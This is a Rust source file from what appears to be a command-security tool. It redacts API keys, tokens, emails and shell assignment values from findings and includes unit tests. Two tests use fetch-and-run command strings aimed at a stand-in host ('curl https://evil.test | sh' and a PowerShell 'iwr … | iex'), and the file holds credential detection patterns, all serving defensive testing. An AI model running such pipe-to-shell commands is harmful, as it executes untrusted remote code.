Skip to main content

tirith_core/
redact.rs

1use once_cell::sync::Lazy;
2use regex::Regex;
3
/// Credential redaction entry: a compiled pattern plus the number of leading
/// characters of each match that stay visible.
///
/// When a match is redacted, its first `prefix_len` characters are kept and the
/// remainder is replaced with `[REDACTED]`.
struct CredRedactEntry {
    /// Compiled pattern whose matches get redacted.
    regex: Regex,
    /// Number of leading characters of a match to leave visible (0 hides the whole match).
    prefix_len: usize,
}
10
11/// Credential patterns loaded from credential_patterns.toml at compile time.
12static CREDENTIAL_REDACT_PATTERNS: Lazy<Vec<CredRedactEntry>> = Lazy::new(|| {
13    #[derive(serde::Deserialize)]
14    struct CredFile {
15        pattern: Option<Vec<CredPat>>,
16        private_key_pattern: Option<Vec<PkPat>>,
17    }
18    #[derive(serde::Deserialize)]
19    struct CredPat {
20        regex: String,
21        redact_prefix_len: Option<usize>,
22    }
23    #[derive(serde::Deserialize)]
24    struct PkPat {
25        #[allow(dead_code)]
26        regex: String,
27        redact_regex: Option<String>,
28    }
29
30    let toml_str = include_str!("../assets/data/credential_patterns.toml");
31    let cred_file: CredFile = toml::from_str(toml_str).expect("invalid credential_patterns.toml");
32
33    let mut entries = Vec::new();
34    if let Some(patterns) = cred_file.pattern {
35        for p in patterns {
36            if let Ok(re) = Regex::new(&p.regex) {
37                entries.push(CredRedactEntry {
38                    regex: re,
39                    prefix_len: p.redact_prefix_len.unwrap_or(4),
40                });
41            }
42        }
43    }
44    if let Some(pk_patterns) = cred_file.private_key_pattern {
45        for pk in pk_patterns {
46            // `redact_regex` covers the full PEM block (header+body+footer);
47            // fall back to the header-only regex when the TOML entry omits it.
48            let redact_pattern = pk.redact_regex.as_deref().unwrap_or(&pk.regex);
49            if let Ok(re) = Regex::new(redact_pattern) {
50                entries.push(CredRedactEntry {
51                    regex: re,
52                    prefix_len: 0,
53                });
54            }
55        }
56    }
57    entries
58});
59
60/// Built-in redaction patterns: (label, regex).
61static BUILTIN_PATTERNS: Lazy<Vec<(&'static str, Regex)>> = Lazy::new(|| {
62    vec![
63        (
64            "OpenAI API Key",
65            Regex::new(r"sk-[A-Za-z0-9]{20,}").unwrap(),
66        ),
67        ("AWS Access Key", Regex::new(r"AKIA[A-Z0-9]{16}").unwrap()),
68        ("GitHub PAT", Regex::new(r"ghp_[A-Za-z0-9]{36,}").unwrap()),
69        (
70            "GitHub Server Token",
71            Regex::new(r"ghs_[A-Za-z0-9]{36,}").unwrap(),
72        ),
73        (
74            "Anthropic API Key",
75            Regex::new(r"sk-ant-[A-Za-z0-9\-]{20,}").unwrap(),
76        ),
77        (
78            "Slack Token",
79            Regex::new(r"xox[bprs]-[A-Za-z0-9\-]{10,}").unwrap(),
80        ),
81        (
82            "Email Address",
83            Regex::new(r"[A-Za-z0-9._%+\-]+@[A-Za-z0-9.\-]+\.[A-Za-z]{2,}").unwrap(),
84        ),
85    ]
86});
87
88/// Redact sensitive content from a string using built-in and credential patterns.
89pub fn redact(input: &str) -> String {
90    let mut result = input.to_string();
91    // Built-ins first: they produce labeled replacements like `[REDACTED:Foo]`.
92    for (label, regex) in BUILTIN_PATTERNS.iter() {
93        result = regex
94            .replace_all(&result, format!("[REDACTED:{label}]"))
95            .into_owned();
96    }
97    // Credential patterns run afterwards and preserve a short prefix.
98    for entry in CREDENTIAL_REDACT_PATTERNS.iter() {
99        result = entry
100            .regex
101            .replace_all(&result, |caps: &regex::Captures| {
102                let matched = &caps[0];
103                let prefix: String = matched.chars().take(entry.prefix_len).collect();
104                format!("{prefix}[REDACTED]")
105            })
106            .into_owned();
107    }
108    result
109}
110
111/// Pre-compiled set of custom DLP patterns.
112pub struct CompiledCustomPatterns {
113    patterns: Vec<Regex>,
114}
115
116impl CompiledCustomPatterns {
117    /// Compile custom DLP patterns once for reuse across multiple redaction calls.
118    pub fn new(raw_patterns: &[String]) -> Self {
119        let patterns = raw_patterns
120            .iter()
121            .filter_map(|pat_str| match Regex::new(pat_str) {
122                Ok(re) => Some(re),
123                Err(e) => {
124                    eprintln!("tirith: warning: invalid custom DLP pattern '{pat_str}': {e}");
125                    None
126                }
127            })
128            .collect();
129        Self { patterns }
130    }
131}
132
133/// Redact using both built-in and custom patterns from policy.
134pub fn redact_with_custom(input: &str, custom_patterns: &[String]) -> String {
135    let mut result = redact(input);
136    for pat_str in custom_patterns {
137        if pat_str.len() > 1024 {
138            eprintln!(
139                "tirith: DLP pattern too long ({} chars), skipping",
140                pat_str.len()
141            );
142            continue;
143        }
144        match Regex::new(pat_str) {
145            Ok(re) => {
146                result = re.replace_all(&result, "[REDACTED:custom]").into_owned();
147            }
148            Err(e) => {
149                eprintln!("tirith: warning: invalid custom DLP pattern '{pat_str}': {e}");
150            }
151        }
152    }
153    result
154}
155
156/// Redact using built-in patterns and pre-compiled custom patterns (avoids per-call recompilation).
157pub fn redact_with_compiled(input: &str, compiled: &CompiledCustomPatterns) -> String {
158    let mut result = redact(input);
159    for re in &compiled.patterns {
160        result = re.replace_all(&result, "[REDACTED:custom]").into_owned();
161    }
162    result
163}
164
165/// Redact shell-style assignment values such as `KEY=value` before user content
166/// is serialized into logs or JSON output.
167pub fn redact_shell_assignments(input: &str) -> String {
168    let chars: Vec<char> = input.chars().collect();
169    let mut out = String::with_capacity(input.len());
170    let mut i = 0;
171
172    while i < chars.len() {
173        if let Some((prefix, next)) = redact_powershell_env_assignment(&chars, i) {
174            out.push_str(&prefix);
175            out.push_str("[REDACTED]");
176            i = next;
177            continue;
178        }
179
180        if is_assignment_start(&chars, i) {
181            let name_start = i;
182            i += 1;
183            while i < chars.len() && (chars[i].is_ascii_alphanumeric() || chars[i] == '_') {
184                i += 1;
185            }
186            if i < chars.len() && chars[i] == '=' {
187                let name: String = chars[name_start..i].iter().collect();
188                out.push_str(&name);
189                out.push_str("=[REDACTED]");
190                i += 1;
191                i = skip_assignment_value(&chars, i);
192                continue;
193            }
194            out.push(chars[name_start]);
195            i = name_start + 1;
196            continue;
197        }
198
199        out.push(chars[i]);
200        i += 1;
201    }
202
203    out
204}
205
206/// Redact a command-like string for public output by scrubbing assignment values
207/// first, then applying built-in and custom DLP patterns.
208pub fn redact_command_text(input: &str, custom_patterns: &[String]) -> String {
209    let scrubbed = redact_shell_assignments(input);
210    redact_with_custom(&scrubbed, custom_patterns)
211}
212
213/// Return a redacted clone of the provided findings for public-facing output.
214pub fn redacted_findings(
215    findings: &[crate::verdict::Finding],
216    custom_patterns: &[String],
217) -> Vec<crate::verdict::Finding> {
218    let mut redacted = findings.to_vec();
219    redact_findings(&mut redacted, custom_patterns);
220    redacted
221}
222
223/// Redact sensitive content from a Finding's string fields in-place.
224pub fn redact_finding(finding: &mut crate::verdict::Finding, custom_patterns: &[String]) {
225    finding.title = redact_with_custom(&finding.title, custom_patterns);
226    finding.description = redact_with_custom(&finding.description, custom_patterns);
227    if let Some(ref mut v) = finding.human_view {
228        *v = redact_with_custom(v, custom_patterns);
229    }
230    if let Some(ref mut v) = finding.agent_view {
231        *v = redact_with_custom(v, custom_patterns);
232    }
233    for ev in &mut finding.evidence {
234        redact_evidence(ev, custom_patterns);
235    }
236}
237
238fn redact_evidence(ev: &mut crate::verdict::Evidence, custom_patterns: &[String]) {
239    use crate::verdict::Evidence;
240    match ev {
241        Evidence::Url { raw } => {
242            *raw = redact_with_custom(raw, custom_patterns);
243        }
244        Evidence::CommandPattern { matched, .. } => {
245            *matched = redact_command_text(matched, custom_patterns);
246        }
247        Evidence::EnvVar { value_preview, .. } => {
248            *value_preview = redact_with_custom(value_preview, custom_patterns);
249        }
250        Evidence::Text { detail } => {
251            *detail = redact_command_text(detail, custom_patterns);
252        }
253        Evidence::ByteSequence { description, .. } => {
254            *description = redact_with_custom(description, custom_patterns);
255        }
256        // HostComparison and HomoglyphAnalysis hold domain names / char analysis,
257        // not user content — nothing to redact.
258        _ => {}
259    }
260}
261
262/// Redact all findings in a verdict in-place.
263pub fn redact_verdict(verdict: &mut crate::verdict::Verdict, custom_patterns: &[String]) {
264    for f in &mut verdict.findings {
265        redact_finding(f, custom_patterns);
266    }
267}
268
269/// Redact all findings in a slice in-place.
270pub fn redact_findings(findings: &mut [crate::verdict::Finding], custom_patterns: &[String]) {
271    for f in findings.iter_mut() {
272        redact_finding(f, custom_patterns);
273    }
274}
275
/// Whether `prev` may directly precede the start of an assignment: ASCII whitespace
/// (which includes newlines) or one of the shell separators `;`, `|`, `&`, `(`.
fn is_assignment_boundary(prev: char) -> bool {
    match prev {
        ';' | '|' | '&' | '(' => true,
        other => other.is_ascii_whitespace(),
    }
}
279
280fn is_assignment_start(chars: &[char], idx: usize) -> bool {
281    let ch = chars[idx];
282    if !(ch.is_ascii_alphabetic() || ch == '_') {
283        return false;
284    }
285    if idx > 0 && !is_assignment_boundary(chars[idx - 1]) {
286        return false;
287    }
288    true
289}
290
/// Return the index just past the assignment value that starts at `idx`.
///
/// The value ends at the first unquoted, unescaped ASCII whitespace character or
/// `;`, `|`, `&`, or at the end of input. Single and double quotes toggle quoting;
/// a backslash escapes the next character everywhere except inside single quotes.
/// If `idx` is already at or past the end, it is returned unchanged.
fn skip_assignment_value(chars: &[char], mut idx: usize) -> usize {
    /// Quoting state of the scanner; the two quote kinds never nest into each other.
    #[derive(Clone, Copy)]
    enum Quote {
        Unquoted,
        Single,
        Double,
    }

    let mut quote = Quote::Unquoted;
    let mut escaped = false;

    while let Some(&ch) = chars.get(idx) {
        if escaped {
            // The character after a backslash is consumed verbatim.
            escaped = false;
        } else {
            match (quote, ch) {
                (Quote::Unquoted, '\\') | (Quote::Double, '\\') => escaped = true,
                (Quote::Unquoted, '\'') => quote = Quote::Single,
                (Quote::Single, '\'') => quote = Quote::Unquoted,
                (Quote::Unquoted, '"') => quote = Quote::Double,
                (Quote::Double, '"') => quote = Quote::Unquoted,
                (Quote::Unquoted, c)
                    if c.is_ascii_whitespace() || matches!(c, ';' | '|' | '&') =>
                {
                    break;
                }
                _ => {}
            }
        }
        idx += 1;
    }

    idx
}
329
330fn redact_powershell_env_assignment(chars: &[char], idx: usize) -> Option<(String, usize)> {
331    if idx > 0 && !is_assignment_boundary(chars[idx - 1]) {
332        return None;
333    }
334    if chars.get(idx) != Some(&'$') {
335        return None;
336    }
337    let prefix = ['e', 'n', 'v', ':'];
338    for (offset, expected) in prefix.iter().enumerate() {
339        let ch = chars.get(idx + 1 + offset)?;
340        if !ch.eq_ignore_ascii_case(expected) {
341            return None;
342        }
343    }
344
345    let name_start = idx + 5;
346    let first = *chars.get(name_start)?;
347    if !(first.is_ascii_alphabetic() || first == '_') {
348        return None;
349    }
350
351    let mut i = name_start + 1;
352    while i < chars.len() && (chars[i].is_ascii_alphanumeric() || chars[i] == '_') {
353        i += 1;
354    }
355    let mut value_start = i;
356    while value_start < chars.len() && chars[value_start].is_ascii_whitespace() {
357        value_start += 1;
358    }
359    if chars.get(value_start) != Some(&'=') {
360        return None;
361    }
362    value_start += 1;
363    while value_start < chars.len() && chars[value_start].is_ascii_whitespace() {
364        value_start += 1;
365    }
366
367    let prefix_text: String = chars[idx..value_start].iter().collect();
368    let value_end = skip_assignment_value(chars, value_start);
369    Some((prefix_text, value_end))
370}
371
// Unit tests for the redaction helpers.
//
// NOTE(review): several token literals are assembled with `concat!` — presumably so the
// complete token never appears verbatim in this source file (e.g. to avoid tripping
// secret scanners); confirm before simplifying.
#[cfg(test)]
mod tests {
    use super::*;

    /// An OpenAI-style `sk-` key is replaced by its labeled marker.
    #[test]
    fn test_redact_openai_key() {
        let key = concat!("sk-", "abcdefghijklmnopqrstuvwxyz12345678");
        let input = format!("export OPENAI_API_KEY={key}");
        let redacted = redact(&input);
        assert!(!redacted.contains("sk-abcdef"));
        assert!(redacted.contains("[REDACTED:OpenAI API Key]"));
    }

    /// An `AKIA…` access key id is replaced by its labeled marker.
    #[test]
    fn test_redact_aws_key() {
        let input = "AWS_ACCESS_KEY_ID=AKIAIOSFODNN7EXAMPLE";
        let redacted = redact(input);
        assert!(!redacted.contains("AKIAIOSFODNN7EXAMPLE"));
        assert!(redacted.contains("[REDACTED:AWS Access Key]"));
    }

    /// A `ghp_` personal access token is replaced by its labeled marker.
    #[test]
    fn test_redact_github_pat() {
        let pat = concat!("gh", "p_ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijkl");
        let input = format!("GITHUB_TOKEN={pat}");
        let redacted = redact(&input);
        assert!(!redacted.contains("ghp_ABCDEF"));
        assert!(redacted.contains("[REDACTED:GitHub PAT]"));
    }

    /// Email addresses embedded in prose are redacted.
    #[test]
    fn test_redact_email() {
        let input = "contact: user@example.com for details";
        let redacted = redact(input);
        assert!(!redacted.contains("user@example.com"));
        assert!(redacted.contains("[REDACTED:Email Address]"));
    }

    /// Text without anything secret-looking must come back unchanged.
    #[test]
    fn test_redact_no_false_positive() {
        let input = "normal text without any secrets";
        let redacted = redact(input);
        assert_eq!(input, redacted);
    }

    /// A policy-supplied pattern is applied on top of the built-ins.
    #[test]
    fn test_redact_with_custom() {
        let input = "internal ref: PROJ-12345 in the system";
        let custom = vec![r"PROJ-\d+".to_string()];
        let redacted = redact_with_custom(input, &custom);
        assert!(!redacted.contains("PROJ-12345"));
        assert!(redacted.contains("[REDACTED:custom]"));
    }

    /// An `sk-ant-` key gets the Anthropic label.
    #[test]
    fn test_redact_anthropic_key() {
        let key = concat!("sk-ant-api03-", "abcdefghijklmnop");
        let input = format!("ANTHROPIC_API_KEY={key}");
        let redacted = redact(&input);
        assert!(!redacted.contains("sk-ant-api03"));
        assert!(redacted.contains("[REDACTED:Anthropic API Key]"));
    }

    /// `redact_finding` must reach the description, both views and each evidence kind
    /// exercised here (EnvVar, Text, CommandPattern).
    #[test]
    fn test_redact_finding_covers_all_fields() {
        use crate::verdict::{Evidence, Finding, RuleId, Severity};
        let openai_key = concat!("sk-", "abcdefghijklmnopqrstuvwxyz12345678");
        let github_pat = concat!("gh", "p_ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijkl");
        let aws_key = "AKIAIOSFODNN7EXAMPLE";

        // One secret planted in every string field the redactor is expected to visit.
        let mut finding = Finding {
            rule_id: RuleId::SensitiveEnvExport,
            severity: Severity::High,
            title: "test".into(),
            description: format!("exports {openai_key}"),
            evidence: vec![
                Evidence::EnvVar {
                    name: "OPENAI_API_KEY".into(),
                    value_preview: openai_key.into(),
                },
                Evidence::Text {
                    detail: format!("saw {github_pat}"),
                },
                Evidence::CommandPattern {
                    pattern: "export".into(),
                    matched: format!("export OPENAI_API_KEY={openai_key}"),
                },
            ],
            human_view: Some(format!("key is {openai_key}")),
            agent_view: Some(format!("{aws_key} exposed")),
            mitre_id: None,
            custom_rule_id: None,
        };

        redact_finding(&mut finding, &[]);

        assert!(finding.description.contains("[REDACTED:OpenAI API Key]"));
        assert!(!finding.description.contains("sk-abcdef"));

        match &finding.evidence[0] {
            Evidence::EnvVar { value_preview, .. } => {
                assert!(value_preview.contains("[REDACTED:OpenAI API Key]"));
            }
            _ => panic!("expected EnvVar"),
        }
        match &finding.evidence[1] {
            Evidence::Text { detail } => {
                assert!(detail.contains("[REDACTED:GitHub PAT]"));
            }
            _ => panic!("expected Text"),
        }
        match &finding.evidence[2] {
            // Command text goes through assignment scrubbing first, so the value is
            // replaced by the plain `[REDACTED]` marker rather than a labeled one.
            Evidence::CommandPattern { matched, .. } => {
                assert!(matched.contains("OPENAI_API_KEY=[REDACTED]"));
                assert!(!matched.contains("sk-abcdef"));
            }
            _ => panic!("expected CommandPattern"),
        }

        assert!(finding
            .human_view
            .as_ref()
            .unwrap()
            .contains("[REDACTED:OpenAI API Key]"));
        assert!(finding
            .agent_view
            .as_ref()
            .unwrap()
            .contains("[REDACTED:AWS Access Key]"));
    }

    /// Assignment scrubbing hides values too short for the built-in key patterns.
    #[test]
    fn test_redact_shell_assignments_scrubs_short_secret_assignments() {
        let redacted =
            redact_shell_assignments("OPENAI_API_KEY=sk-secret curl https://evil.test | sh");
        assert!(redacted.contains("OPENAI_API_KEY=[REDACTED]"));
        assert!(!redacted.contains("sk-secret"));
    }

    /// PowerShell `$env:NAME = 'value'` keeps the name and spacing but hides the value.
    #[test]
    fn test_redact_shell_assignments_scrubs_powershell_env_assignments() {
        let redacted = redact_shell_assignments(
            "$env:OPENAI_API_KEY = 'sk-secret'; iwr https://evil.test | iex",
        );
        assert!(redacted.contains("$env:OPENAI_API_KEY = [REDACTED]"));
        assert!(!redacted.contains("sk-secret"));
    }
}
519}